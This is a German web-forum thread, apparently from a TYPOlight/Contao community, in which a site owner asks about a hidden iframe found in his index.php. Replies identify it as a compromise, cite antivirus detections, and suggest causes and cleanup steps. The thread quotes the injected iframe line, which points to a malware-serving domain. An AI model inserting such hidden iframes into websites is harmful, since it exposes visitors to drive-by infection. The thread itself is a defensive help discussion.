Hallo,
kann mir jemand sagen, was
aus der index.php bewirkt? Erst einmal wirkt das auf mich "komisch".Code:<iframe src="http://lifecounter.cn/p/index.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>
Gruß
Ludger
Hallo,
kann mir jemand sagen, was
aus der index.php bewirkt? Erst einmal wirkt das auf mich "komisch".Code:<iframe src="http://lifecounter.cn/p/index.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>
Gruß
Ludger
Hallo Ludger,
ich finde diese Codezeile unter http://lifecounter.cn gar nicht.
also wenn deine Domain nicht gerade lifecounter ist dann würde ich fast behaupten wurdest du gehackt.
Hatte sowas mal mit nem anderen CMS.
sehr unfein ... letzteres sauberes Backup einspielen!
Kaspersky und andere melden mir bei der referenzierten Seite einen Trojaner:
04.08.2009 10:36:02 http://lifecounter.cn/p/index.php//index Firefox
Gefunden: HEUR:Exploit.Script.Generic
Fragt sich allerdings, wie das in Deine Installation hineinkommt. Wenn das so einfach ist, dann würde mich der Weg auch dringend interessieren.
Was für ein System fährst Du?
Carolina.
Contao in Kiel: kikmedia webdevelopment | Contao-Partnerin | Contao Usergroup Kiel | github | Contao-Community-Alliance | MetaModels-Team
Mein Avira Pro meckert auf der Seite die Malware exp/swf.28992 an.
Klingt für mich auch nach einem typischen Hack vom Webspace. Gründe dafür gibt es viele:
- Der ganze Server wurde z. B. aufgrund veralteter darauf laufender Software gehackt (erkennt man daran, wenn andere Webhosting-Kunden auf dem gleichen Server ebenfalls dieses Iframe aufweisen)
- Dein Webspace wurde gehackt; liegt meist an unsicheren Scripts die sich irgendwo darauf befinden; oft z. B. veraltete oder selbst erstellte Scripte die nicht gegen XSS oder ähnlichen Lücken gesichert sind
- geklaute FTP-Passwörter (z. B. über Fake-Seitenverlinkungen in Websites)
hi,
wenn du eine alte version *filezilla* nutzen solltest, ist das der grund. über ein leck konnten dort die hinterlegten ftp-zugänge ausspioniert werden.
folgendes wird auf dem account passieren:
nach und nach wird der unsichtbare iframe mit adlinks von google gefüllt , bis diese dann irgendwann der iframe mal freigestellt wird und deine indexseite damit überspühlt wird. bei klick gibt es dann ganz normal geld von google an die hacker
lösche den iframe und ändere die ftp-zugangsdaten. befallen sind in der regel nur index-dateien.
Geändert von sq...... (04.08.2009 um 10:42 Uhr)
... würde mich persönlich eher interessieren, wie das konkret in diese Installation gekommen ist. Informationen dazu, auf welchem Webserver, mit welcher TL-Version, mit welcher benutzten Software, PHP- & MySQL-Version und in welcher Konfiguration fände ich extrem hilfreich.
Ich möchte schon wissen, ob das ein individuelles oder ein globales Problem ist. Ein grundsätzliches Problem (sprich: die Möglichkeit, TL-Installationen zu kompromittieren) möchte ich jedenfalls bei geschätzten 30 Kundenseiten nicht an der Backe haben.
Ludger, kannst Du bitte mal die entsprechenden Informationen posten? Danke!
Carolina.
Contao in Kiel: kikmedia webdevelopment | Contao-Partnerin | Contao Usergroup Kiel | github | Contao-Community-Alliance | MetaModels-Team
hi lucina,
das ganze wurde vor einiger zeit schonmal diskutiert und es ist kein problem von TL !!! musste mal im alten forum schauen ... HIER
Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
Lesezeichen